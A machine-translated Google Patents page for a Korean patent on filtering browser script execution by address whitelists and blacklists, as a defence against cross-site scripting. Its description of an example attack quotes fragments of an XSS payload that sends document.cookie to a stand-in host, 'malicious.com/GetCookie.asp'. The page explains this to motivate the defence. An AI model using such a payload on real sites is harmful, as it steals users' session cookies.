KR101305755B1 - Appatatus and method for filtering execution of script based on address - Google Patents

Appatatus and method for filtering execution of script based on address Download PDF

Info

Publication number
KR101305755B1
KR101305755B1 KR1020120016876A KR20120016876A KR101305755B1 KR 101305755 B1 KR101305755 B1 KR 101305755B1 KR 1020120016876 A KR1020120016876 A KR 1020120016876A KR 20120016876 A KR20120016876 A KR 20120016876A KR 101305755 B1 KR101305755 B1 KR 101305755B1
Authority
KR
South Korea
Prior art keywords
list
script
web page
terminal
addresses
Prior art date
Application number
KR1020120016876A
Other languages
Korean (ko)
Inventor
임을규
장표
Original Assignee
한양대학교 산학협력단
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by 한양대학교 산학협력단 filed Critical 한양대학교 산학협력단
Priority to KR1020120016876A priority Critical patent/KR101305755B1/en
Application granted granted Critical
Publication of KR101305755B1 publication Critical patent/KR101305755B1/en

Links

Images

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F16/00Information retrieval; Database structures therefor; File system structures therefor
    • G06F16/90Details of database functions independent of the retrieved data types
    • G06F16/95Retrieval from the web
    • G06F16/958Organisation or management of web site content, e.g. publishing, maintaining pages or automatic linking
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/30Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information
    • H04L63/306Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information intercepting packet switched data communications, e.g. Web, Internet or IMS communications

Abstract

Apparatus and methods are provided for filtering script execution. Whether or not the script included in the web page is executed is determined based on a match between the script's address and the addresses in the list. The list is generated based on the information in the web page or the information stored in the terminal. The list can be a white-list or a black-list for script execution. The list can be applied on a web page or web site basis.

Description

Device and method for filtering script execution based on address {APPATATUS AND METHOD FOR FILTERING EXECUTION OF SCRIPT BASED ON ADDRESS}

The present invention relates to an apparatus and method for filtering script execution, and more particularly, to an apparatus and method for determining whether to execute a script based on an address of a script.

Web browsers are becoming increasingly important applications for personal computers (PCs) and smart phones.

However, web browsers can be attacked in many ways. An example of an attack on a web browser is Cross-Site-Scripting (XSS), one of the cyber attacks that has already become a big issue worldwide.

Web sites can provide dynamic web pages as well as simple static web pages of the past. The server of the web site may receive a value from the user's web browser, process the input value, and then display the generated information back to the user by processing the input values. The dynamic web page may refer to a web page showing information generated based on the user's input after the user's input is processed.

A malicious user can enter code that causes malicious script to run, rather than the normal contents. The web site's server generates a web page containing code that can execute malicious script. When another user requests the web page, the web page is sent from the server to another user's personal computer or the like. Another user's web browser loads a web page, executing malicious script contained within the web page. Malicious scripts perform malicious actions. As an example of malicious operation, the malicious script may transmit other user information (eg, a cookie of a web browser) to the malicious user's computer.

Existing solutions to XSS attacks have a number of problems. Traditional solutions are less available. In order for existing solutions to operate effectively, the provider of the web service and the user of the web service must have knowledge of information security. In other words, existing solutions are difficult to operate by users without additional professional training.

Korean Patent Publication No. 10-2010-0053056 (published Aug. 02, 2011) provides a method for processing a document that is executed on a computing device and includes executable text. The document processing method may include: 1) when the document is being processed or the document is being processed, whether the executable text in the document is derived from untrusted content containing untrusted content and / or untrusted content. Determining whether it is affected by 2) and 2) if the executable text is derived from or is affected by untrusted content, identifying the executable text as untrusted content.

An embodiment may provide an apparatus and a method for limiting script execution on a web page or web site basis.

An embodiment may provide an apparatus and a method for determining whether to execute a script based on an address of the script.

According to an aspect, a method of processing a web page by a terminal, the method comprising: receiving the web page from a server, generating a list including one or more addresses based on information in the web page, in the web page Identifying a script, determining whether to execute the script based on a match between the address of the script and the list, and executing the script when execution of the script is determined. This is provided.

The determining may include determining execution of the script if an address matching the address of the script exists among the one or more addresses.

The determining may include querying a user whether the script is executed if an address matching the address of the script does not exist among the one or more addresses, and if the response to the query indicates execution of the script. Determining the execution of may further include.

The determining may include determining execution of the script if there is no address matching the address of the script among the one or more addresses.

Generating the list including the one or more addresses may include identifying a tag in the web page that includes text representing the list and generating the list based on the text.

The tag may be in a header of the web page.

The generating of the list including the one or more addresses may further include reading information related to the determination of whether to execute the script from the storage of the terminal and generating the list based on the information. .

The list may be applied for each web page.

The list may be applied to each server that provides a web service.

The generating of the list may include: generating a web page-list including one or more addresses based on information in the web page, based on information related to determining whether to execute a script read from a storage of the terminal. Generating a terminal-list including the above addresses, generating the list by merging the web page-list and the terminal-list if the web page-list and the terminal-list do not contradict each other and the web If the page-list and the terminal-list conflict with each other, the method may include using the web page-list as the list.

If the web-page list and the terminal-list are both white-list or black-list, the web page-list and the terminal-list may not contradict each other. If one of the web page-list and the terminal-list is a white-list and the other is a black-list, the web page-list and the terminal-list may contradict each other.

According to another aspect, the processor includes a processor for receiving a web page from a server and a processor for executing a web browser for outputting the web page, the processor identifying a script in the web page, and providing information to the information in the web page. A terminal is provided, which generates a list including one or more addresses, determines whether to execute the script based on a matching between the address and the list of the script, and executes the script when execution of the script is determined. .

The processor may determine execution of the script if an address matching the address of the script exists among the one or more addresses.

The processor may determine the execution of the script if one of the one or more addresses does not match the address of the script.

The processor may identify a tag in the web page that includes text representing the list and generate the list based on the text.

The terminal may further include a storage unit that stores information related to determining whether to execute the script.

The processor may receive the information from the storage unit and generate the list based on the information.

According to another aspect, a recording medium having a program for processing a web page is recorded, code for generating a list containing one or more addresses based on information in the loaded web page, script in the loaded web page And a program including code for determining whether to execute based on a match between the address of the script and the list and code for causing the script to be executed when execution of the script is determined. A recording medium is provided.

An apparatus and method are provided for limiting script execution on a web page or website basis.

An apparatus and method are provided for determining whether to execute a script based on the address of the script.

1 illustrates an example of an XSS attack method.
2 illustrates an example of malicious script code used for an XSS attack.
3 is a block diagram of a terminal according to an embodiment.
4 illustrates a web page processing method of restricting execution of a script, according to an exemplary embodiment.
5 illustrates a method of determining a script to be executed based on a list generation and a generated list according to an example.
6 is a flowchart illustrating a list generating method according to an example.
7 is a flowchart illustrating a method of determining whether to execute a script according to an example.

In the following, embodiments will be described in detail with reference to the accompanying drawings. Like reference symbols in the drawings denote like elements.

Hereinafter, the terms “Uniform Resource Locator (URL)” and “Uniform Resource Identifier (URI)” are used in the same sense and may be interchanged with each other.

Hereinafter, a device capable of executing a web browser, such as a personal computer and a smart phone, will be referred to as a terminal. A device that provides a web page displayed within a web browser is named a server. The browser or terminal running the browser receives the web page from the server and outputs the web page in the browser.

1 illustrates an example of an XSS attack method.

In step 110, the server sends the first web page to the first terminal of the malicious user.

In step 120, the first terminal outputs the transmitted first web page. The output first web page is a web page that can receive a text string or the like from a user through a text box.

In step 130, the malicious user inputs a code representing the execution of the malicious script as a string. Hereinafter, a malicious user who performs an XSS attack is named as an attacker, and the code indicating execution of the malicious script is outlined as malicious script code. The malicious script could be in a server used by the attacker. Therefore, the malicious script code may include information indicating the address of the malicious script.

In step 140, a string representing malicious script code is transmitted from the first terminal to the server.

In step 150, the server generates a second web page that contains malicious script code.

In step 160, the server transmits a second web page that includes the second terminal of the general user.

In step 170, the second terminal outputs the transmitted second web page. As the second web page is output, the browser of the second terminal executes the malicious script code.

An example of malicious script code is described in detail with reference to FIG. 2 below.

2 illustrates an example of malicious script code used for an XSS attack.

In the malicious script code of FIG. 2, the tags '<script>' and '</ script>' indicate that the content (i.e. text or string) between the tags is the execution of the script. It may indicate that. 'malicious.com' can represent the address of the server used by the attacker. 'malicious.com/GetCookie.asp' can represent the address of the script used by the attacker. '? cookie = "+ document.cookie; window.open (url, width = 0, height = 0)' may mean input values or user information to be passed to the script.

When the user's web browser outputs a page containing malicious script code, the web browser may execute the malicious script code of FIG. 2. The malicious script may not display any information in the web browser. Thus, even though the user's information has been transmitted to the attacker, the user cannot recognize at all that the user has been attacked by XSS and that his information has been leaked.

In order to prevent XSS attacks as described with reference to FIGS. 1 and 2, a method is needed that can limit the execution of scripts contained within web pages.

3 is a block diagram of a terminal according to an embodiment.

The terminal 300 may include a transceiver 310, a processor 320, and a storage 330.

The transceiver 310 may transmit / receive data such as a web page, an input value, a script code, and the like with an external entity such as a web server. The transceiver 310 may be a network interface, a networking chip, or a networking module.

The processor 320 may execute an application such as a web browser and a database.

The storage unit 330 may be a storage that stores data necessary for the operation of the terminal 300. The storage unit 330 may be a physical storage medium such as a RAM, a hard disk drive (HDD), a solid state drive (SSD), or the like, and may include a table and a database. Data structure such as

4 illustrates a web page processing method of restricting execution of a script, according to an exemplary embodiment.

In operation 410, the transceiver 310 of the terminal 300 may receive a web page from the server 400.

In steps 420 through 450, the processor 320 of the terminal 300 may process a web page. Here, the processing of the web page may mean outputting the received web page in the browser of the terminal.

In step 420, the processor 320 may generate a list. The web page may include information used to generate the list. The processor 320 may generate a list based on the information in the received web page. The above list can be used to determine whether to execute a script in a web page. The list may include one or more addresses. According to one side, the processor 320 may execute the script only if there is an address matching the address of the script among the one or more addresses in the list. That is, the list can be a white-list of executions of the script. According to another side, the processor 320 may execute the script only when there is no address matching the address of the script among one or more addresses in the list. That is, the list can be a black-list of the execution of the script. Specific methods of generating the list are described in detail below with reference to FIGS. 5 and 6.

Here, the matching of addresses (i.e., one of the one or more addresses in the list and the address of the script) may mean that 1) both addresses are the same, and 2) one of the two addresses is different. It may mean that it is part of one address (eg, a prefix), and 3) it may mean that Internet Protocol addresses (IP addresses) corresponding to both addresses are the same.

In step 430, the processor 320 may identify the script within the web page.

In step 440, the processor 320 may determine whether to execute the identified script based on a match between the script's address and the list. For example, if the address of the script is the same as the address of one of the one or more addresses in the list, processor 320 may execute the identified script.

The processor 320 may determine whether a script having a specific address is executed without the above matching. For example, if the address of the web page and the address of the script match each other, the processor 320 may determine execution of the script. For example, if the address of the script matches the address of an application programming interface (API) providing service, the processor 320 may determine execution of the script.

Specific methods of determining whether to execute a script are described in detail with reference to FIGS. 5 and 7 below.

In operation 450, the processor 320 may determine whether to execute the script. If it is determined that the script is to be executed, step 460 may be performed. If it is determined that the script is not to be executed, the script may be discarded and the procedure may be terminated.

In operation 460, the processor 320 may execute the script when it is determined to execute the script.

5 illustrates a method of determining a script to be executed based on a list generation and a generated list according to an example.

The web browser 510 may include a script filter 512 and a script engine 514. The script filter 512 may be a module or code that determines whether to execute a script. The script engine 514 may be a module or code that executes a script. The processor 320 may execute a web browser 510, a script filter 512, and a script engine 514. Thus, all operations described below as being performed by web browser 510, script filter 512, or script engine 514 may be considered to be executed by processor 320.

The script filter 512 may be an application of the terminal 300 or a plug-in of the web browser 510. The script filter 512 is based on 1) code for generating a list containing one or more addresses, 2) code for identifying a script within a loaded web page, and 3) whether the script is executed or not based on a match between the script's address and the list. 4) and if the execution of the script is determined, the script may include code that causes the script to be executed by the web browser 510 (ie, the script engine 514).

The web browser 510 may load the web page 520.

The web browser 510 may identify the script within the loaded web page. Here, the script may be code (eg, '<script>' and '</ script>' tags) indicating execution of the script. As a script in the web page 520, a first script 526 in the header 522 and a second script 528 in addition to the header 522 are illustratively shown.

The script filter 512 may determine whether to execute the identified script. The script filter 512 may determine whether to execute the script based on a match between the script address and the list. The script filter 512 may generate a list based on the first list information 524 and / or the second list information 532. The first list information 524 may refer to the information in the received web page described above in step 420 of FIG. 4.

The first list information 524 may be present in the loaded web page 520. For example, the first list information 524 may include text representing a list, and may include a tag indicating that the text represents a list. Here, the tag may be a predetermined string or a pair of strings (eg, '<script-address-list>' and '</ script-address-list>'). The above tag indicates information on the list, and may be previously promised between the provider of the web service and the producer of the web browser (or the plug-in of the web browser). That is, the first list information 524 may be a tag including text indicating a list in the web page 520. The first list information 524 can be in the header 522 of the web page 520. The script filter 512 may generate a list based on text representing the list of the first list information 524.

The web page 520 may be generated by a provider of a web service (eg, a web page designer or web page developer). Therefore, the provider may control whether to execute the script included in the web page 520 by inserting the first list information 524 in the web page 520. Some of the content of the dynamic page may be generated based on information input by a malicious user and not a provider. Thus, the script in the dynamically generated web page 520 may be generated or inserted by a malicious user other than the provider. As described above with reference to FIG. 1, the address of such a script may be associated with a server used by a malicious user. Therefore, the provider may control whether to execute the script that is not inserted by the provider through the first list information 524.

The first list information 524 may be shared by one or more web pages provided by a web server. Web pages can be written to include specific files. The specific file may include first list information 524. Thus, if the first list information 524 in a specific file is changed or updated, the above change or update may be applied to all web pages in the web server collectively.

The provider can manage the address of a script used by web pages in the web site provided by the provider, and update the first list information 524 whenever a script using a specific address is added to the web page 520. Can be. The update can be performed by an automated tool.

The second list information 532 may exist in the database 530. Here, the database 530 may refer to data managed by the storage unit 330 or the storage unit 330 described above with reference to FIG. 3.

The second list information 532 may be information related to determining whether to execute the script. For example, the second list information 532 may be text representing a list. The script filter 512 may generate a list based on the second list information 532.

The user of the terminal 300 may generate the second list information 532 and store the generated second list information 532 in the database 530. Accordingly, the user may control whether to execute the script included in the web page 520 by generating, changing, or updating the second list information 532.

The script filter 512 may apply the list to each web page 520. For example, the second list information may provide information related to determining whether to execute different scripts for each web page 520.

The script filter 512 may apply the list to each server that provides a web service. For example, the second list information may provide information related to determining whether to execute different scripts for each server). In addition, the script filter 512 may use the first list information in the first web page of the specific web server to determine whether to execute the script in the second web page of the web server.

In the following, generation of the list is described in more detail with reference to FIG. 6.

The script filter 512 may determine whether to execute the script based on the generated list. Script filter 512 can use the generated list as a white-list or black-list. For example, when the list is used as a white-list, the script filter 512 may determine execution of the script if there is an address that matches the address of the script among one or more addresses in the list. When the list is used as a black-list, the script filter 512 may determine to execute the script if no one of the one or more addresses in the list matches the address of the script.

In the following, execution of the script is described in more detail with reference to FIG.

6 is a flowchart illustrating a list generating method according to an example.

Generating the list 420 described above with reference to FIG. 4 may include all or part of the following steps 610-650. The following steps 610 to 650 may be performed by the processor 320 or the script filter 512.

At step 610, first listing information 524 may be identified within the web page 520.

In step 615, a web page-list may be generated based on the first list information 524. The web page-list may be the list described above with reference to FIG. 5.

In operation 620, the second list information 532 may be read from the storage 330 of the terminal 300.

In step 625, the terminal-list may be generated based on the second list information 532. The terminal-list may be the list described above with reference to FIG. 5.

In one aspect of the invention, the above-described steps 620 and 625 may be selectively performed only when the first list information 524 does not exist in the web page 520.

In steps 630 to 650 below, a list may be generated based on a web page-list and / or a terminal-list (ie, first list information 524 and / or second list information 532). have.

In step 630, it may be determined whether the web page-list and the terminal-list are in conflict with each other. For example, if the web page-list and the terminal-list are both white-lists (or black-lists), both lists may be considered inconsistent with each other. On the other hand, if one of the web page-list and the terminal-list is a white-list, and the other is a black-list, both lists may be considered to contradict each other. If the web page-list and the terminal-list do not contradict each other, step 640 may be performed. Step 650 may be performed if the web page-list and the terminal-list conflict with each other.

In step 640, if the web page-list and the terminal-list do not contradict each other, the list may be generated by merging the web page-list and the terminal-list. That is, the list may be generated by merging one or more addresses included in the web page-list and one or more addresses included in the terminal-list. For example, if the web page-list and the terminal-list are both white-lists, if one of the one or more addresses in the web page-list or one or more addresses in the terminal-list exists that matches the address of the script, The script can be executed. Thus, the list may include both one or more addresses that the web page-list includes and one or more addresses that the terminal-list includes.

In step 650, if the web page-list and the terminal-list conflict with each other, one of the web page-list and the terminal-list may be selected as the list. For example, if the web page-list is a white-list and the terminal-list is a black-list, the web page-list may be used as the list. That is, the web page-list generated based on the first list information 524 set by the provider is more than the terminal-list generated based on the second list information 532 set by the user of the terminal 300. It may be considered to have a high priority. The priority difference between the web page-list and the terminal-list may be due to the assumption that the provider of the web service will be more aware of the web service it provides than the user of the terminal 300.

7 is a flowchart illustrating a method of determining whether to execute a script according to an example.

Determining whether to execute the script described above with reference to FIG. 4 may include all or some of the following steps 710 to 760. The following steps 710 to 760 may be performed by the processor 320 or the script filter 512.

In step 710, the type of list may be checked. If the list is a white-list, step 720 may be performed. If the list is a black-list, step 730 may be performed.

In step 720, it may be checked whether there is an address that matches the script among the one or more addresses in the list. If there is an address in the list that matches the script among the one or more addresses, then execution of the script may be determined at step 750. If no one of the one or more addresses in the list matches the script, step 740 may be performed.

In step 730, it may be checked whether there is no address matching the script among the one or more addresses in the list. If no one of the one or more addresses in the list matches the script, execution of the script may be determined at step 750. If no one of the one or more addresses in the list matches the script, steps 740-744 can be performed.

Steps 740 to 744 may be performed if the execution of the script cannot be determined by the list. For example, when the list is a white-list, steps 740 through 744 may be performed if no address among the one or more addresses in the list matches the address of the script.

In step 740, the user may be queried whether the script is executed. In operation 740, a message for asking the user whether to execute the script may be output on the terminal 300. The query may be for a professional user who can precisely control whether or not the script is executed.

In step 742, a response to the query may be received from the user.

At step 744, it may be checked whether the response to the query indicates the execution of the script. Execution of the script may be determined at step 750 if the response to the query indicates execution of the script. If the response to the query does not indicate the execution of the script, then it may be determined in step 760 not to run the script.

Steps 740-744 may be optional. For example, if the execution of the script cannot be determined by the list, it may be determined not to execute the script immediately at step 760 without querying the user.

Through the web page processing method according to the above-described embodiment, the user of the terminal 300 provides protection from the XSS through the above method without recognizing the application of the above method or having no separate knowledge of the XSS. I can receive it. The user of the terminal 300 may be provided with the above web page processing method by updating a web browser or installing a plug-in. In addition, by using a special tag for identifying the first list information, compatibility with the default browser of the browser using the embodiment of the present invention can be maintained.

Embodiments include a computer readable medium having program instructions for performing various computer implemented operations. In particular, in the present embodiment, a code for generating a list including one or more addresses based on information in a loaded web page, whether to execute a script in the loaded web page based on a matching between the address of the script and the list. And a computer readable medium having recorded thereon a program including code for determining and code for causing the script to be executed when the execution of the script is determined. The program according to the present embodiment may be composed of a PC-based program or a mobile terminal exclusive application (for example, a form of a smart phone application, a feature phone VM (virtual machine), etc.). The program or application may be a web browser or a plug-in of a web browser. It may be configured to be executed by at least one processor running in the terminal.

The computer readable medium may include program instructions, data files, data structures, etc. alone or in combination. The program instructions to be recorded on the medium may be those specially designed and configured for the embodiments or may be available to those skilled in the art of computer software. In addition, the above-described file system can be recorded in a computer-readable recording medium.

As described above, the technical details described in the embodiments can be variously modified and modified. Therefore, the scope of the invention should not be limited to the described embodiments, but should be determined by the equivalents of the appended claims, as well as the appended claims.

300: terminal
310: Transmitting /
320: processor
330:
510: web browser
512: script filter
514: script engine
520: Web page
524: first list information
532: second list information

Claims (17)

  1. In the method for the terminal to process the web page,
    Receiving the web page from a server;
    Generating a list comprising one or more addresses based on the information in the web page;
    Identifying a script within the web page;
    Determining whether to execute the script based on a match between the script address and the list; And
    Executing the script when the execution of the script is determined
    Lt; / RTI &gt;
    Generating the list including the one or more addresses,
    Identifying a tag within the web page that includes text representing the list; And
    Generating the list based on the text
    Including, the web page processing method.
  2. The method of claim 1,
    Wherein the determining comprises:
    Determining execution of the script if one of the one or more addresses matches the address of the script
    Including, the web page processing method.
  3. The method of claim 2,
    Wherein the determining comprises:
    Querying a user whether the script is executed if an address matching the address of the script does not exist among the one or more addresses; And
    Determining execution of the script if a response to the query indicates execution of the script
    Further comprising, the web page processing method.
  4. The method of claim 1,
    Wherein the determining comprises:
    Determining execution of the script if one of the one or more addresses does not match an address of the script
    Including, the web page processing method.
  5. delete
  6. The method of claim 1,
    And the tag is in a header of the web page.
  7. The method of claim 1,
    Generating the list including the one or more addresses,
    Reading information related to determining whether to execute a script from the storage of the terminal; And
    Generating the list based on the information
    Further comprising, the web page processing method.
  8. The method of claim 1,
    The list is applied to each web page, web page processing method.
  9. The method of claim 1,
    And the list is applied to each server that provides a web service.
  10. The method of claim 1,
    Generating the list,
    Generating a web page-list comprising one or more addresses based on the information in the web page;
    Generating a terminal-list including one or more addresses based on information related to determining whether to execute a script read from a repository of the terminal;
    Generating the list by merging the web page-list and the terminal-list if the web page-list and the terminal-list do not contradict each other; And
    Using the web page-list as the list if the web page-list and the terminal-list conflict with each other.
    Including, the web page processing method.
  11. The method of claim 10,
    If the web-page list and the terminal-list are both white-list or black-list, the web page-list and the terminal-list do not contradict each other, and one of the web page-list and the terminal-list is white The web page-list and the terminal-list are inconsistent with each other if the list and the other are the black-list.
  12. Receiving unit for receiving a web page from the server; And
    A processor that executes a web browser that outputs the web page
    Lt; / RTI &gt;
    The processor identifies a script within the web page, generates a list including one or more addresses based on the information in the web page, and determines whether to run the script based on a match between the script's address and the list. And if the execution of the script is determined, execute the script,
    Wherein the processor identifies a tag in the web page that includes text representing the list and generates the list based on the text.
  13. delete
  14. delete
  15. delete
  16. delete
  17. In a recording medium in which a program for processing a web page is recorded,
    Code for generating a list comprising one or more addresses based on the information in the loaded web page;
    Code for determining whether to execute a script in the loaded web page based on a match between the address of the script and the list; And
    Code that causes the script to execute when it is determined to execute the script
    Lt; / RTI &gt;
    Code for generating a listing comprising the one or more addresses identifies a tag within the web page that includes text representing the listing, and generates the listing based on the text.
    A computer-readable recording medium, in which a program is recorded.
KR1020120016876A 2012-02-20 2012-02-20 Appatatus and method for filtering execution of script based on address KR101305755B1 (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
KR1020120016876A KR101305755B1 (en) 2012-02-20 2012-02-20 Appatatus and method for filtering execution of script based on address

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
KR1020120016876A KR101305755B1 (en) 2012-02-20 2012-02-20 Appatatus and method for filtering execution of script based on address

Publications (1)

Publication Number Publication Date
KR101305755B1 true KR101305755B1 (en) 2013-09-17

Family

ID=49455472

Family Applications (1)

Application Number Title Priority Date Filing Date
KR1020120016876A KR101305755B1 (en) 2012-02-20 2012-02-20 Appatatus and method for filtering execution of script based on address

Country Status (1)

Country Link
KR (1) KR101305755B1 (en)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
KR101820043B1 (en) 2016-12-15 2018-01-18 주식회사 수산아이앤티 Mobile terminal identification, and business model using mobile terminal identification

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
KR20060117693A (en) * 2005-05-13 2006-11-17 (주)트리니티소프트 Web security method and apparatus therefor
KR20100032095A (en) * 2008-09-17 2010-03-25 한국항공대학교산학협력단 Fire wall system and method for web application program based on static analysis
JP2011503715A (en) * 2007-11-05 2011-01-27 マイクロソフト コーポレーション Cross-site scripting filter
KR20110095534A (en) * 2010-02-19 2011-08-25 박희정 Real-time vulnerability diagnoses and results information offer service system of web service

Patent Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
KR20060117693A (en) * 2005-05-13 2006-11-17 (주)트리니티소프트 Web security method and apparatus therefor
JP2011503715A (en) * 2007-11-05 2011-01-27 マイクロソフト コーポレーション Cross-site scripting filter
KR20100032095A (en) * 2008-09-17 2010-03-25 한국항공대학교산학협력단 Fire wall system and method for web application program based on static analysis
KR20110095534A (en) * 2010-02-19 2011-08-25 박희정 Real-time vulnerability diagnoses and results information offer service system of web service

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
KR101820043B1 (en) 2016-12-15 2018-01-18 주식회사 수산아이앤티 Mobile terminal identification, and business model using mobile terminal identification

Similar Documents

Publication Publication Date Title
JP4912400B2 (en) Immunization from known vulnerabilities in HTML browsers and extensions
EP2183881B1 (en) Cross-domain communication
US9336191B2 (en) System, method and computer readable medium for recording authoring events with web page content
US8347396B2 (en) Protect sensitive content for human-only consumption
US8660976B2 (en) Web content rewriting, including responses
US8612993B2 (en) Identity persistence via executable scripts
US8332654B2 (en) Secure framework for invoking server-side APIs using AJAX
De Keukelaere et al. Smash: secure component model for cross-domain mashups on unmodified browsers
US8826411B2 (en) Client-side extensions for use in connection with HTTP proxy policy enforcement
US8353036B2 (en) Method and system for protecting cross-domain interaction of a web application on an unmodified browser
EP2847686B1 (en) Enhanced document and event mirroring for accessing content
US9270647B2 (en) Client/server security by an intermediary rendering modified in-memory objects
US9443257B2 (en) Securing expandable display advertisements in a display advertising environment
US10044753B2 (en) Intercepting and supervising calls to transformed operations and objects
US8789204B2 (en) Method and apparatus for secure cross-site scripting
JP5254656B2 (en) Client-side protection through referrer checks against drive-by farming
US9356937B2 (en) Disambiguating conflicting content filter rules
US20080301766A1 (en) Content processing system, method and program
US8943208B2 (en) Controlling access to resources by hosted entities
US10367903B2 (en) Security systems for mitigating attacks from a headless browser executing on a client computer
US20100017853A1 (en) System and method for selecting a web service from a service registry based on audit and compliance qualities
US9241004B1 (en) Alteration of web documents for protection against web-injection attacks
CN102132304A (en) Form filling with digital identities, and automatic password generation
CN101953110A (en) Mashup component isolation via server-side analysis and instrumentation
CN102027472A (en) Method and system to selectively secure the display of advertisements on web browsers

Legal Events

Date Code Title Description
A201 Request for examination
E902 Notification of reason for refusal
E701 Decision to grant or registration of patent right
GRNT Written decision to grant
FPAY Annual fee payment

Payment date: 20160705

Year of fee payment: 4

LAPS Lapse due to unpaid annual fee